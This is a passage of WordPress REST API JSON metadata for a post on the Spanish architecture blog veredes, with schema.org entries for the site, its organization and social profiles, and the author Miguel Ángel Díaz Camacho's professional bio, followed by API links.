divulgaci\u00f3n","description":"veredes","publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"alternateName":"veredes","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/veredes.es\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/veredes.es\/blog\/#organization","name":"veredes, arquitectura y divulgaci\u00f3n","alternateName":"veredes","url":"https:\/\/veredes.es\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","width":140,"height":54,"caption":"veredes, arquitectura y divulgaci\u00f3n"},"image":{"@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/x.com\/veredes","https:\/\/instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/es.pinterest.com\/veredes\/","https:\/\/www.tumblr.com\/veredes"]},{"@type":"Person","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/e3a2f3fc087cf59bab205fb869b57b1d","name":"Miguel \u00c1ngel D\u00edaz Camacho","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/miguel\u00e1ngeld\u00edazcamacho-96x96.jpg","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/miguel\u00e1ngeld\u00edazcamacho-96x96.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/miguel\u00e1ngeld\u00edazcamacho-96x96.jpg","caption":"Miguel \u00c1ngel D\u00edaz Camacho"},"description":"Es doctor arquitecto y actual presidente de la Asociaci\u00f3n Sostenibilidad y Arquitectura. Delegado del Consejo Superior de los Colegios de Arquitectos de Espa\u00f1a (CSCAE) en el Consejo Europeo de Arquitectos, Architects Council of Europe (ACE). Socio fundador en MADC Arquitectos, compa\u00f1\u00eda establecida en Madrid que ha recibido numerosos premios en concursos nacionales e internacionales. Investigador y profesor universitario, su filosof\u00eda de trabajo y pensamiento te\u00f3rico han sido ampliamente desarrollados en publicaciones como \u201cP\u00e1rrafos de Arquitectura. Core(oh)graf\u00edas\u201d (Ediciones Asim\u00e9tricas, 2016) o \u201cArquitectura y Cambio Clim\u00e1tico\u201d (Fundaci\u00f3n Arquia, 2018). En la actualidad desarrolla proyectos de arquitectura y urbanismo en Espa\u00f1a y Noruega.","sameAs":["https:\/\/madc.xyz\/","https:\/\/www.facebook.com\/diazcamacho","https:\/\/www.instagram.com\/madc_architecture\/","https:\/\/www.linkedin.com\/in\/madcarquitectos\/","https:\/\/x.com\/https:\/\/twitter.com\/MADCARQUITECTOS"],"url":"https:\/\/veredes.es\/blog\/author\/miguel-angel-diaz-camacho\/"}]}},"_links":{"self":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/67310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/comments?post=67310"}],"version-history":[{"count":0,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/67310\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media\/67311"}],"wp:attachment":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media?parent=67310"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/categories?post=67310"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/tags?post=67310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}